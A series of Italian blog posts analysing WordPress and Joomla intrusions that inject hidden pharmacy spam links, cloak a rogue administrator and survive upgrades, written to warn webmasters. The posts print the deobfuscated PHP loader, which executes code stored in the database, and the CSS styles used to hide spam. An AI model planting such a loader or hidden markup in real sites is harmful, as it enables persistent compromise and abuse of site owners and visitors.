Oggi ho provato qualche ricerca con termini ricorrenti nei link di spam, e indovinate un po’: decine di siti, anche italiani, che presentano link spam nascosti nella home page, iniettati in modo molto simile a quello usato in molti siti che impiegano WordPress. Secondo la cache dei motori di ricerca, le pagine sono state visitate tutte dopo l’inizio di agosto, dal 10 in poi.

Spero di sbagliarmi, che siano siti compromessi da molto più tempo, e per ragioni differenti, e non l’inizio di una nuova piaga.

Ah, il WordPress Autotest, anche se si lamenta che il sito non è basato appunto su WordPress, rileva comunque parole chiave e stili CSS atti a nascondere contenuto, ossia funziona anche con Joomla, anche se con qualche incertezza. Dato che la strategia di spamming rimane la stessa, pur cambiando lo strumento, i test euristici rilevano le stesse stranezze di tutti gli altri siti compromessi.

Il primo passo era di reperire il file da qualche parte, ed a questo qualcuno c’è arrivato, bravo Nanni. Era sufficiente cercare in Google una delle stringhe mostrate nell’immagine. Ad esempio basta inserire la stringa lpa1zxy (la terza in alto nell’immagine) in Google, ed il primo risultato è quello voluto. Notare che i siti che si ottengono dalla ricerca sono stati compromessi in vari modi, e probabilmente lo sono ancora. I bug e le vulnerabilità su cui si basano le intrusioni sono noti ormai da anni e se un webmaster non sa fare il suo lavoro è un suo problema.

Reperito il file, rimane da capire cosa stiamo guardando. A prima vista sembra qualcosa di cifrato con un algoritmo piuttosto banale, tipo una codifica Base64, o una ROT-13 (o cifrario di Cesare modificato).

Invece, e qui si mostra ancora una volta la genialità del mentecatto, si tratta di normale codice PHP, in cui le stringhe apparentemente codificate sono soltanto dei commenti. Eliminandoli e ricostruendo il codice “attivo” il risultato è un misero:

<?
$f = create_function("",strrev(get_option("wordpress_options")));
$f();
?>

Tutto qui. Questo è quello che viene inserito come plugin nei blog basati su WordPress violati dal mentecatto. Il plugin non fa altro che scaricare dal database, nella tabella delle opzioni di WordPress, un record iniettato contenente il vero plugin, e lo esegue. Il plugin ha varie funzioni, principalmente quella di controllare lo user agent dei visitatori e presentare i link di spam se è il GoogelBot a visitare il sito, mentre se è un normale visitatore proveniente da una ricerca per le pillole a basso costo lo reindirizza sul sito della farmacia. Poi ha anche altre funzioni, tipicamente di autodifesa, ed è capace di rimettersi in sesto se il blog viene aggiornato o viene fatto un tentativo di pulizia senza usare le maniere forti. Ne esiste una seconda variante, assolutamente identica come codice PHP attivo, sono soltanto differenti le finte stringhe cifrate, cioè i commenti.

Ne ho parlato e scritto fino alla nausea. Il mentecatto (i mentecatti, le infezioni sono in più varianti, questa è la più diffusa) è uno che ci capisce, non un wannabe. I blog WordPress infetti sono ancora al loro posto, mentre i proprietari dormono sonni tranquilli. Qualcuno ha pure fatto il test, ha visto i risultati e ha continuato come se niente fosse. Se ritiene che qualche link di spam non sia poi un gran problema, beh, in bocca al lupo.

Lo scopo dell’indovinello era quello di verificare le capacità di analisi, assolutamente necessarie per ricostruire gli eventi in caso di intrusione in un sito web. Analizzando questo file, che nei siti compromessi non ha mai l’apparenza di un file PHP, sono riuscito a trovare dove era nascosto il codice che presentava i link e che deviava le visite. Da lì ho scovato le altre iniezioni di dati nel database, ad esempio la cache dei link spam, e la modalità di reinfezione, o di sopravvivenza ad un upgrade. Peccato, una occasione persa, per tutti. Probabilmente sono io che non ho capito bene in cosa consista la Computer Forensics.

Al prossimo indovinello. Ah, a proposito, qualcuno usa Joomla? Beh, sappiate che state per andare in massa a fare compagnia a chi ha WordPress in versione “farcita”. Alcuni blog WordPress compromessi mostrano come link di spam siti che fanno uso di Joomla, naturalmente “farciti” con una variante prontamente sviluppata dal mentecatto. Naturalmente è sufficiente un upgrade alla versione corretta per mettersi al riparo, ma certamente non possiamo fare a meno di quel plugin bellissimissimo che con la nuova versione non funziona, e poi il tema stiloso non si vede bene, eh.

Tranquilli, il mentecatto si fa molti meno problemi. A lui il vostro sito piace com’è. Farcito.

Passando alla versione 2.6 l’unico indizio che ci sia qualcosa di poco pulito è il contatore degli amministratori nell’elenco degli utenti.

Come potete notare nella figura sopra, c’è un solo utente, amministratore, visualizzato nell’elenco, ma il conteggio ne riporta 2.

Disabilitando Javascript e ricaricando la pagina si svela l’arcano: appare immediatamente il secondo amministratore dal nome WordPress, nella colonna “Nome” mostra solo tre puntini. Esaminando il codice HTML della pagina si scopre lo script di “cloaking” dell’amministratore abusivo, di cui avevo già parlato.

Nessun altro indizio evidente mostra che il blog è compromesso ed in mano ad altri. L’unica possibilità è data da una accurata analisi di tutto quanto costituisce il blog stesso, database compreso, naturalmente sapendo dove e cosa cercare.

Aggiornando alla versione 2.6.1 le cose cambiano, ma non di molto. Solo la prima volta che si entra nella gestione dei plugin si ottiene il messaggio mostrato qui sotto:

Per me e per chi ha dimestichezza con WordPress questi messaggi sono il chiaro indice che qualcosa non va, ma per la maggior parte dei tenutari di blog probabilmente non hanno molto significato. Il problema è che i messaggi appaiono solo la prima volta che si entra nel pannello di gestione plugin del blog dopo l’aggiornamento, per non comparire mai più.

Ai fini dello sradicamento dell’intrusione non si ottiene la pulizia completa. Occorre ancora intervenire a mano, e non è sufficiente cancellare l’amministratore abusivo ed i plugin fasulli. Nel blog c’è sicuramente ancora roba nascosta, file modificati, residui nel database. L’incursore ha potuto leggere le credenziali di accesso al database stesso, in chiaro nel file wp-config.php, ed ha molte frecce al suo arco:

• i file camuffati, inseriti ovunque, potrebbero essere shell remote, capaci di modificare a piacere i file dell’installazione, aggiungerne altri, cancellarli, ecc.
• i file del tema e dei plugin potrebbero essere stati modificati per eseguire pezzi di codice PHP a comando
• I falsi plugin sono ancora presenti, se il webmaster non li ha cancellati
• nel database c’è ancora una copia di riserva della remote shell, e la cache dei link di spam

I primi tre punti sono porte aperte alla “reinfezione” del blog, l’ultimo è semplicemente fatica in meno per l’incursore.

Ho trovato almeno tre blog in rete (sì i proprietari sono stati avvertiti) aggiornati alla versione 2.6 che non mostravano più il comportamento di forgiare la pagina a seconda del visitatore (utente normale o GoogleBot), ma avevano centinaia di link spam nascosti in fondo ai post nella home page. Ipotizzo, cosa da verificare ma verosimile, che il proprietario abbia aggiornato ignorando di essere vittima dell’intrusione, ed i file corrotti dall’intrusione siano stati sovrascritti, cosa che ha fatto perdere al mentecatto la possibilità di inserire link spam a piacere senza intervenire direttamente sul blog. Naturalmente, il nostro amico non si è perso d’animo: ha immediatamente approfittato del proprio account amministratore abusivo ed ha modificato i post in prima pagina inserendo i link spam all’interno di un blocco HTML con uno stile utile a nasconderli ai visitatori umani (ad esempio con style="display:none", oppure con style="overflow:hidden;width:0;height:0"). Oppure, anche dopo aver perso anche l’amministratore abusivo, scoperto e cancellato dal webmaster più attento, potrebbe essere in grado di accedere il database MySQL dall’esterno e modificare a mano i post per accodare i link spam. Lo può fare perché ha potuto leggere le credenziali di accesso al database, contenute in wp-config.php. Non dovrebbe essere possibile farlo dall’esterno, i servizi di hosting non dovrebbero permettere l’accesso al server database a chiunque. Se però nel blog vi sono ancora i file modificati dall’incursore per eseguire codice PHP a comando, come mostrato qui, per il mentecatto è un gioco da ragazzi inserire un paio di righe di PHP da eseguire al volo per modificare il record nel database relativo al post ed aggiungere i link spam.

Il risultato è che, pur dopo tutti gli aggiornamenti, se avevamo il blog infetto e non abbiamo usato le maniere forti, saremo daccapo in poco tempo. Nel frattempo, il mentecatto non sta con le mani in mano e molto probabilmente sta correndo ai ripari: a breve l’aggiornamento a WordPress 2.6.x potrebbe non essere più efficace per scoprire l’intrusione.

L’unica cosa che, ironia della sorte, potrebbe porre fine all’abuso del nostro blog da parte del mentecatto è il crescente numero di servizi di indicizzazione e motori di ricerca che adottano politiche di esclusione del siti compromessi. Quando il nostro sito venisse escluso da tutti (Google, Technorati, FeedBurner, ecc.), il mentecatto non saprebbe più cosa farsene, e lo lascerebbe al suo destino. Certo, a quel punto il nostro blog sarebbe un rottame: invisibile da Internet, non più indicizzato dai principali motori di ricerca e aggregatori, saremmo come la voce che grida nel deserto. O peggio potrebbe essere venduto a qualche organizzazione dedita al phishing, a cui non importa il posizionamento del sito nei motori di ricerca.

Uscire da quello stato di limbo non è molto facile, e molto tempo occorre per recuperare credibilità agli occhi degli innumerevoli siti di indicizzazione. E’ meglio intervenire prima possibile.

Avere un sito web oggi è veramente semplice. Anche senza spendere un centesimo, ci sono siti che offrono spazio web e possibilità di creare anche pagine dinamiche, con PHP o simili, con o senza database, gratuitamente.

Anche acquistare un nome (www.qualcosa.net) con relativo spazio di pubblicazione è alla portata di quasi tutti. Con una manciata di Euro è possibile registrarsi il nome, avere lo spazio web ed un certo numero di caselle di posta personalizzate.

Dal lato gestione e creazione dei contenuti il panorama è lo stesso. Esistono decine di software per creare il proprio blog, partendo da WordPress per finire con un semplice editor di testo, per chi ama il fai da te estremo, tutti a costo zero.

Insomma improvvisarsi webmaster è cosa fatta. Ma, e qui l’asino si sfracella, i problemi nascono quando succedono cose che su Internet sono all’ordine del giorno: una intrusione, un tentativo di sfruttare qualcosa nel nostro sito web per fare cose certamente poco corrette dal punto di vista etico.

Come si può vedere dall’articolo pubblicato poco prima di questo, anche usando un software molto collaudato i problemi possono insorgere da una gestione poco accorta. Gestione che richiede delle competenze non certo gratuite. Nel senso che acquisirle costa tempo e fatica, e non bastano un paio di articoletti letti qua e là.

Il problema è molto sottovalutato, e molti webmaster mancano di alcune competenze basilari, mancanza che mette di fronte a rischi gravissimi, ben più di un semplice 500 Internal server error. Supponiamo che il nostro sito web contenga un software molto diffuso per gestirne i contenuti, proprio come WordPress. Uso questo nome perché ben conosciuto, ma è importante capire che nessun software è esente da questo tipo di problemi. E quando dico nessuno intendo proprio nessuno.
Tornando alla situazione in ipotesi: si scopre che il software scelto per il nostro sito contiene un errore che permette di inserire file nel sito e di eseguirli come parte del software stesso. La nostra responsibilità è quella di fare in modo che nessuno possa sfruttare questo errore, e quindi il nostro sito, per danneggiare altri.

La soluzione più semplice è, naturalmente, aggiornare il software non appena disponibile la versione corretta. Nel frattempo, se l’errore è effettivamente molto grave, sul sito del produttore del software dovrebbero essere pubblicati dei metodi per diminuire il rischio di essere colpiti (bucati come si dice a volte) o per limitare il danno.

Tutto lineare, logico e condivisibile, no?

No. Manco per niente. Quello che succede nella realtà è ben altro. E posso parlarne con cognizione di causa, visto che nell’indagare al problema dei siti compromessi in WordPress pieni di spam link ho tentato di avvertire oltre cento persone.

Di queste solo poche hanno risposto e corretto il problema, una percentuale risibile. Molti siti sono abbandonati a sé stessi da mesi o anni, ed il proprietario/webmaster non ha pubblicato sul sito nessun contatto per essere rintracciato. Ovviamente, come ultima ratio finisce che si lascia un commento nel blog, ma è rischioso, perché se i commenti non sono moderati è come mettere una freccia al neon alta 10 metri con su scritto “questo sito è vulnerabile”.

Moltissimi non rispondono ai messaggi, e sì che ho badato bene a non nominare i soliti farmaci, come pure ho cercato di evitare alcune parole chiave tipiche dello spam, per evitare filtri antispam troppo zelanti. Mi sembrava di essere in una partita di Taboo, il gioco in cui devi far indovinare una parola senza dire una serie di termini palesemente correlati con la parola stessa. Per esempio se la parola è “balena”, non puoi dire mammifero, mare, Moby Dick, Achab e via così.

Per non parlare di reazioni “piccate” di alcuni, che hanno avuto reazioni simili a chi si sente spiato.

Ma la cosa più frustrante è che molti di questi siti appartengono a grafici, sviluppatori e webmaster, quindi persone che, verosimilmente, hanno dimestichezza con Internet ed in generale con tutto quello che comporta organizzare un sito web.

Naturalmente occorre mettere in conto che la reazione normale ad uno sconosciuto che ti scrive per avvertire che il tuo sito web contiene “cose strane” può andare dall’incredulità all’indifferenza (ma che vuole ‘sto tizio?), fino alla diffidenza (indagavi sul mio sito?). Questo è assolutamente comprensibile.

Quello che è incomprensibile è gestire un sito prono a possibili infiltrazioni da parte di malintenzionati ignorando le possibili conseguenze di questa leggerezza. Nei casi da me esaminati l’intruso si è limitato a queste attività:

• Diffondere spam link attraverso il posizionamento nei motori di ricerca dei blog violati.
• Redirigere i visitatori ai siti “commissionari” dello spam

Il primo problema è che alcuni dei siti su cui si viene rediretti tentano di iniettare malware attraverso il browser dei visitatori. Il secondo problema è che chiunque si veda iniettare malware può facilmente pensare che il sito colpevole è quello che lo ha rediretto sul sito trappola. Tocca al proprietario del sito dimostrare che il codice che effettua la ridirezione non è stato messo intenzionalmente dal proprietario stesso del sito, ma è il risultato di una violazione del sito. E, credetemi, non è proprio facilissimo dimostrarlo.

C’è un altro aspetto, molto più inquietante. Se chi ha violato il sito, forte del fatto che il proprietario non si accorge di nulla e non pone rimedio, decide di “vendere” il sito già scardinato a qualcun altro, le cose potrebbero farsi molto più interessanti. A quel punto, niente potrebbe fermare uno spammer dallo spedire messaggi a tutto il mondo, o archiviare software pirata sul server, o ospitare una raccolta di immagini tali da essere illegali in tutto il mondo o quasi. Oppure usare il sito per ospitare applicazioni trappola, da usare per attacchi di phishing, o per diffondere malware in grado di costruire una botnet. Insomma, solo la fantasia limita le possibilità di fare birbonate.

Nei siti violati che ho personalmente esaminato le tecniche utilizzate mettono ragionevolmente al sicuro il responsabile dell’attacco con l’uso di metodi tesi a lasciare pochissime tracce, quali ad esempio eseguire comandi passati attraverso un form, metodo che nasconde i comandi eseguiti, anche ai log del server su cui il sito è ospitato. Quello che appare all’esterno è che un sito attaccato attraverso il nostro riporta nei log del proprio server tutte le indicazioni che l’attacco è venuto dal nostro sito, mentre nel server che ospita il nostro sito non c’è quasi nulla. Il risultato è che sta di nuovo a noi dimostrare che l’attacco non è condotto da noi.

Il pensare che si è poco importanti per essere attaccati è una pia illusione: in questo tipo di attacchi quello che si cerca non è il sito importante e “visibile”, ma semplicemente un sito pulito da sfruttare, un po’ come quando viene rubata una utilitaria per commettere un furto, e si sceglie il modello più comune col colore più diffuso. In questo caso meno il sito è noto, e visitato, meglio è. Unica eccezione è quando lo scopo è di fare link spam, dove serve un sito ben piazzato nei motori di ricerca per rendere più visibili i link abusivi nelle pagine dei risultati di ricerca.

Concludendo, il messaggio è che se da un lato è semplice ed alla portata di tutti fare il proprio sito web, non è altrettanto semplice e privo di rischi trovarsi a fronteggiare quello che in gergo si chiama incidente di sicurezza. La gestione di una simile eventualità deve essere tempestiva ed efficace, senza trascurare la possibilità che chi ha violato il nostro sito sia già riuscito a commettere qualche crimine sfruttando la situazione.

Paura? Bene, vuol dire che qualcosa è giunto a destinazione.